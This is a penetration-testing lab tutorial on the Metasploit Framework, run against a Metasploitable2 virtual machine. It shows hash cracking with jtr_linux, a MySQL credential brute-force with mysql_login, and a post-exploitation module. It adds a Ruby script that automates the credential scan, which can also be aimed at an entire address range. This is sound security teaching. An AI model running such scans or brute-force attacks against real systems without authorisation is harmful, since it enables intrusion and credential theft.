Introduction
In this lab, we will explore the fundamental concepts and usage of the Metasploit Framework, a powerful open-source penetration testing tool. Metasploit provides a comprehensive platform for identifying and exploiting vulnerabilities in various systems and applications. The goal of this lab is to familiarize you with the core components of Metasploit, its attack methodologies, and basic usage techniques.
Understanding the Metasploit Framework
In this step, we will introduce the Metasploit Framework, its architecture, and core concepts.
Metasploit is a powerful and widely-used penetration testing framework developed in Ruby. It consists of various components, including modules, interfaces, plugins, utilities, and libraries. The framework is designed to be modular, allowing for code reuse and extensibility.
The Metasploit Framework is organized into several key modules:
- Exploits: These are code modules that leverage vulnerabilities in target systems to gain unauthorized access or execute arbitrary code.
- Auxiliary: This module includes various support tools, such as scanners, fuzzers, and protocol manipulation utilities.
- Encoders: These modules transform a payload's bytes, originally so an exploit can avoid "bad characters" (such as null bytes) that would break it in transit. They are sometimes described as obfuscation, but encoding alone does little against modern antivirus; evasion is a separate module type.
- Payloads: These modules contain the code that is executed on the target system after a successful exploitation.
- Post-Exploitation: These modules run through an existing session on a compromised system to gather information, escalate privileges, maintain access or pivot further.
- Nops: These modules generate no-operation sequences used to pad exploit buffers so that a payload lands reliably.
- Evasion: These modules produce payload executables crafted to avoid detection by antivirus software.
Metasploit provides several interfaces for interacting with the framework: the interactive console (msfconsole), which this lab uses; non-interactive use of that same console for scripting (msfconsole -x "commands" or a resource script passed with msfconsole -r); and a web-based interface (Metasploit Web UI) in the commercial editions.
First, start the lab environment. Open the xfce terminal on the desktop (double-click its icon) and start the Metasploitable2 virtual machine with the following command:
sudo virsh start Metasploitable2
Wait for the target machine to boot; this may take 1-3 minutes.
Ping the target machine to ensure it's running (press Ctrl-C to exit ping):
ping 192.168.122.102
Then start the Kali container with host networking (so it shares the host's network stack and can reach the libvirt network the target sits on) and open a bash shell inside it:
docker run -ti --network host b5b709a49cd5 bash
From inside the container, ping the target again to confirm connectivity (press Ctrl-C to exit ping):
ping 192.168.122.102
Now, we could start the Metasploit console:
cd ~
msfconsole
In the following steps, we will explore the basic usage of the Metasploit console and perform various tasks.
Basic Navigation and Module Exploration
In this step, we will learn how to navigate the Metasploit console and explore the available modules.
The Metasploit console provides a command-line interface for interacting with the framework. Here are some basic commands:
- help: Display a list of available commands and their descriptions.
- search [keyword]: Search for modules whose name, path or description matches the keyword.
- info: Show the full description, options, targets and references of the selected module.
Let's search for modules related to Linux in Metasploit console:
search linux
This lists every module whose name, path or description matches "linux", across all module types (exploits, auxiliary, post and payloads), so the list is long. Narrow it with search keywords, for example search type:auxiliary linux or search type:exploit platform:linux.
To select a specific module, use the use command followed by the module path in Metasploit console:
use auxiliary/analyze/jtr_linux
Once a module is selected, you can view its options and required parameters using the show options command in Metasploit console:
show options
Here's an example of the output you might see:
Module options (auxiliary/analyze/jtr_linux):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   BLOWFISH              false            no        Include BLOWFISH hashes (Very Slow)
   BSDI                  true             no        Include BSDI hashes
   CONFIG                                 no        The path to a John config file to use instead of the default
   CRACKER_PATH                           no        The absolute path to the cracker executable
   CUSTOM_WORDLIST                        no        The path to an optional custom wordlist
   DES                   true             no        Include DES hashes
   FORK                  1                no        Forks for John the Ripper to use
   INCREMENTAL           true             no        Run in incremental mode
   ITERATION_TIMEOUT                      no        The max-run-time for each iteration of cracking
   KORELOGIC             false            no        Apply the KoreLogic rules to John the Ripper Wordlist Mode (slower)
   MD5                   true             no        Include MD5 hashes
   MUTATE                false            no        Apply common mutations to the Wordlist (SLOW)
   POT                                    no        The path to a John POT file to use instead of the default
   SHA256                false            no        Include SHA256 hashes (Very Slow)
   SHA512                false            no        Include SHA512 hashes (Very Slow)
   USE_CREDS             true             no        Use existing credential data saved in the database
   USE_DB_INFO           true             no        Use looted database schema info to seed the wordlist
   USE_DEFAULT_WORDLIST  true             no        Use the default metasploit wordlist
   USE_HOSTNAMES         true             no        Seed the wordlist with hostnames from the workspace
   USE_ROOT_WORDS        true             no        Use the Common Root Words Wordlist
   WORDLIST              true             no        Run in wordlist mode

Auxiliary action:

   Name  Description
   ----  -----------
   john  Use John the Ripper

Read the Required column first: nothing here is required, so the module can run as-is. Note also that it does not talk to a target at all; with USE_CREDS true it cracks Linux password hashes that are already stored in the Metasploit database, so it produces nothing until a module such as post/linux/gather/hashdump has looted some.
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Setting Module Options
In this step, we will learn how to set options for a selected module in Metasploit.
First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
Select a module:
use auxiliary/analyze/jtr_linux
Many modules require specific options to be set before they can be executed. You can set an option using the set command followed by the option name and its value in Metasploit console like set OPTION_NAME value.
For example, let's point the jtr_linux module at a specific wordlist. The option for that, as the show options output above lists it, is CUSTOM_WORDLIST (JOHN_PATH is not in that list; msfconsole accepts set for any name without complaint and simply ignores names the module does not declare, so always check the option list before trusting a set):
set CUSTOM_WORDLIST /usr/share/metasploit-framework/data/wordlists/password.lst
That path is where the Metasploit package installs its bundled wordlists; adjust it if your installation differs. CRACKER_PATH is the separate option for the location of the john binary, needed only when it is not on PATH.
You can also use the setg command to set a global option that will persist across module changes.
After setting the required options, execute the module with run. exploit is the traditional command in exploit modules and is accepted as an alias of run in the other module types as well, so for an auxiliary module either works:
run
or
exploit
To go back to the parent context or exit the current module, use the back command.
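The two points above, that the Required column tells you what must be set before run and that set silently accepts option names the module never declared, are easy to check mechanically. The following Ruby script is an added example (not code from the lab or from the Metasploit project) that parses the table show options prints, using the post/windows/gather/enum_logged_on_users layout shown later in this lab as constructed sample input, reports the required options still lacking a value, and checks whether a name is really an option before you set it. The sample text is constructed; the parser works on any module's table because it takes the column boundaries from the header line.

```ruby
# Added example, not part of the lab: parse the table that `show options`
# prints, report the required options that are still unset, and check
# whether a name you are about to `set` is really an option of the module.
# msfconsole accepts `set ANYNAME value` without complaint, so a misspelled
# option is only noticed when the module runs without it.

# Constructed sample of msfconsole output (the rows mirror the
# post/windows/gather/enum_logged_on_users table shown in the lab).
SAMPLE_OUTPUT = <<~OUT
  Module options (post/windows/gather/enum_logged_on_users):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     CURRENT  true             yes       Enumerate currently logged on users
     RECENT   true             yes       Enumerate recently logged on users
     SESSION                   yes       The session to run this module on
OUT

HEADERS = ["Name", "Current Setting", "Required", "Description"].freeze

# Parse the options table into an array of hashes. Column boundaries come
# from the header line, so a blank "Current Setting" cell (SESSION above)
# is read as empty instead of shifting the later columns left.
def parse_show_options(text)
  lines = text.lines.map(&:rstrip)
  header_idx = lines.index { |l| HEADERS.all? { |h| l.include?(h) } }
  raise ArgumentError, "no options table found" unless header_idx

  header = lines[header_idx]
  starts = HEADERS.map { |h| header.index(h) }
  rows = []
  lines.drop(header_idx + 2).each do |line|          # skip the ---- underline
    break if line.strip.empty?                       # blank line ends the table
    cells = starts.each_with_index.map do |start, i|
      stop = starts[i + 1] || line.length
      (line[start...stop] || "").strip
    end
    rows << { name: cells[0], setting: cells[1],
              required: cells[2].casecmp?("yes"), description: cells[3] }
  end
  rows
end

# Names of options the module requires that have no value yet.
def missing_required(rows)
  rows.select { |r| r[:required] && r[:setting].empty? }.map { |r| r[:name] }
end

# True if `name` is an option the module declares (msfconsole matches
# option names case-insensitively, so `set session 1` also works).
def known_option?(rows, name)
  rows.any? { |r| r[:name].casecmp?(name) }
end

if __FILE__ == $0
  rows = parse_show_options(SAMPLE_OUTPUT)
  puts "required but unset: #{missing_required(rows).inspect}"
  %w[SESSION JOHN_PATH].each { |n| puts "#{n} known? #{known_option?(rows, n)}" }
end
```

To use it against a live console, save the output of show options to a file (spool /tmp/opts.txt before the command, spool off after) and pass File.read("/tmp/opts.txt") to parse_show_options.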
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Exploiting a Vulnerability
In this step, we will simulate a real-world scenario and attempt to exploit a vulnerability on a target system.
First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
Assume we have identified a MySQL service on the target IP address 192.168.122.102. We can use the mysql_login module to test it for weak or default credentials. This is a credential attack rather than an exploit of a software flaw, which is why the module lives under auxiliary/scanner rather than exploit/.
Select the mysql_login module in Metasploit console:
use auxiliary/scanner/mysql/mysql_login
Next, set the required options in Metasploit console. Option names are case-insensitive but conventionally written in upper case. The two file paths below are placeholders that you must replace with real wordlists, for example the ones shipped under /usr/share/metasploit-framework/data/wordlists/:
set RHOSTS 192.168.122.102
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
Finally, execute the module in Metasploit console (run is the natural command for an auxiliary module; exploit works as an alias):
exploit
Metasploit tries every username/password combination from the two files against the MySQL service on port 3306 and prints a [+] line for each successful login; if the database is connected (check with db_status), found credentials are also stored and can be listed with the creds command. Because the file paths above are placeholders, the run fails until you supply real wordlists. Related options worth knowing are BLANK_PASSWORDS (also try an empty password), USER_AS_PASS (try each username as its own password) and STOP_ON_SUCCESS (stop after the first valid login per host); show options lists them all.
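Typing the set commands by hand is fine for one run, but a credential scan is something you repeat against every host in scope, and a resource script makes the step reproducible. The following Ruby script is an added example (not code from the lab or from the Metasploit project): it writes small constructed wordlists, generates a msfconsole resource script that performs the mysql_login steps above with STOP_ON_SUCCESS and BLANK_PASSWORDS set, validates RHOSTS before anything is sent, and returns the path to hand to msfconsole -r. The target address and wordlist contents are assumptions for illustration; the lab's real wordlist files are not reproduced.

```ruby
# Added example, not part of the lab: turn the interactive mysql_login steps
# into a msfconsole resource script so the scan is repeatable and can run
# unattended with
#     msfconsole -q -r /path/to/mysql_login.rc
# The target address and the wordlist contents below are constructed for
# illustration; the lab's real wordlist files are not reproduced here.
require "tmpdir"
require "ipaddr"

# Constructed sample wordlists (tiny on purpose; use real lists in practice).
USERS  = %w[root admin mysql].freeze
PASSES = %w[root password toor mysql].freeze

# Fail early on anything that is not an IP address or CIDR range, so a typo
# in RHOSTS is caught here rather than sending the scanner at the wrong host.
def validate_rhosts!(rhosts)
  IPAddr.new(rhosts)   # raises IPAddr::InvalidAddressError on garbage
  rhosts
end

# One entry per line, which is the format USER_FILE / PASS_FILE expect.
def write_wordlist(path, words)
  File.write(path, words.join("\n") + "\n")
  path
end

# Build the resource script. Each line is a console command exactly as it
# would be typed at the prompt; msfconsole replays them in order.
def mysql_login_rc(rhosts, user_file, pass_file, stop_on_success: true)
  validate_rhosts!(rhosts)
  [
    "use auxiliary/scanner/mysql/mysql_login",
    "set RHOSTS #{rhosts}",
    "set USER_FILE #{user_file}",
    "set PASS_FILE #{pass_file}",
    "set BLANK_PASSWORDS true",                 # also try an empty password
    "set STOP_ON_SUCCESS #{stop_on_success}",   # stop per host at first hit
    "set VERBOSE false",                        # print successes only
    "run",
    "creds",                                    # list stored creds (needs the DB)
    "exit -y",                                  # leave without the confirmation prompt
  ].join("\n") + "\n"
end

# Write the wordlists and the .rc under a scratch directory; returns the
# .rc path to pass to msfconsole -r.
def prepare_scan(rhosts, dir = Dir.mktmpdir("msf-mysql"))
  user_file = write_wordlist(File.join(dir, "users.txt"), USERS)
  pass_file = write_wordlist(File.join(dir, "passwords.txt"), PASSES)
  rc_path   = File.join(dir, "mysql_login.rc")
  File.write(rc_path, mysql_login_rc(rhosts, user_file, pass_file))
  rc_path
end

if __FILE__ == $0
  rc = prepare_scan("192.168.122.102")
  puts "msfconsole -q -r #{rc}"
  puts File.read(rc)
end
```

The -q flag only suppresses the banner; the scan output still appears on the console, and with the database connected the creds line prints whatever the scanner saved, so the same script can be pointed at a CIDR range such as 192.168.122.0/24 by changing RHOSTS alone.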
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Post-Exploitation Tasks
In this step, we will explore the post-exploitation modules available in Metasploit, which can be used to maintain access and perform additional actions on a compromised system.
After successfully exploiting a vulnerability and gaining access to the target system, you can use post-exploitation modules to perform various tasks, such as:
- Gathering system information
- Escalating privileges
- Maintaining persistent access
- Pivoting to other systems
First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
To use a post-exploitation module, follow the same steps as with other module types in Metasploit console:
use post/windows/gather/enum_logged_on_users
show options
Here's an example of the output you might see:
Module options (post/windows/gather/enum_logged_on_users):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CURRENT  true             yes       Enumerate currently logged on users
   RECENT   true             yes       Enumerate recently logged on users
   SESSION                   yes       The session to run this module on

SESSION is required and has no value: a post module does not open its own connection to the target but runs through a session that an earlier exploit or delivered payload created. List the open sessions with sessions -l and use the ID of the one you want:
set SESSION 1
run
Running a post module without an existing session fails with an error about the missing session. Note also that this particular module targets Windows, while the Metasploitable2 target in this lab is Linux; against it you would pick a Linux module instead, for example from search type:post platform:linux, such as post/linux/gather/enum_system.
This example module enumerates the logged-on users on a Windows system, but Metasploit provides many other post-exploitation modules for various platforms and tasks.
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Summary
In this lab, we explored the Metasploit Framework, a powerful tool for penetration testing and vulnerability assessment. We learned about the core components of Metasploit, such as exploits, payloads, and auxiliary modules. We also practiced navigating the Metasploit console, searching for modules, setting options, and executing modules to exploit vulnerabilities and perform post-exploitation tasks.
Metasploit provides a comprehensive and versatile platform for ethical hackers, security professionals, and researchers to identify and mitigate security vulnerabilities. By understanding and practicing with Metasploit, you can enhance your skills in penetration testing, vulnerability analysis, and overall security assessment.